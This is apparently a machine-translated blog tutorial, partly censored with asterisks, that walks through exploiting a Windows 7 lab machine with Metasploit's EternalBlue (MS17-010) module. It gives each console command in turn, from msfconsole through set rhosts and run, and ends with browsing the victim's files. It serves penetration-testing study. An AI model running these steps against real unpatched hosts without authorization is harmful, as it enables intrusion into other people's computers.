当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- 10 easy to use automated testing tools
- Group count - word length
- 全球疫情加速互联网企业转型,区块链会是解药吗?
- 如何对Pandas DataFrame进行自定义排序
- Python自动化测试学习哪些知识?
- Subordination judgment in structured data
- How to demote a domain controller in Windows Server 2012 and later
- 多机器人行情共享解决方案
- Chainlink将美国选举结果带入区块链 - Everipedia
- Azure Data Factory(三)整合 Azure Devops 實現CI/CD
猜你喜欢
关于Kubernetes 与 OAM 构建统一、标准化的应用管理平台知识!(附网盘链接)
100元扫货阿里云是怎样的体验?
Python自动化测试学习哪些知识?
Network programming NiO: Bio and NiO
Can't be asked again! Reentrantlock source code, drawing a look together!
Calculation script for time series data
【新閣教育】窮學上位機系列——搭建STEP7模擬環境
事半功倍:在没有机柜的情况下实现自动化
Use of vuepress
CCR炒币机器人:“比特币”数字货币的大佬,你不得不了解的知识
随机推荐
PLC模拟量输入和数字量输入是什么
【快速因數分解】Pollard's Rho 演算法
加速「全民直播」洪流,如何攻克延时、卡顿、高并发难题?
Details of dapr implementing distributed stateful service
xmppmini 專案詳解:一步一步從原理跟我學實用 xmpp 技術開發 4.字串解碼祕笈與訊息包
用Python构建和可视化决策树
遞迴思想的巧妙理解
給萌新HTML5 入門指南(二)
Subordination judgment in structured data
Python自动化测试学习哪些知识?
How to get started with new HTML5 (2)
Filecoin最新动态 完成重大升级 已实现四大项目进展!
事半功倍:在没有机柜的情况下实现自动化
如果前端不使用SPA又能怎样?- Hacker News
2018中国云厂商TOP5:阿里云、腾讯云、AWS、电信、联通 ...
业内首发车道级导航背后——详解高精定位技术演进与场景应用
PHP应用对接Justswap专用开发包【JustSwap.PHP】
如何对Pandas DataFrame进行自定义排序
Dapr實現分散式有狀態服務的細節
用Keras LSTM构建编码器-解码器模型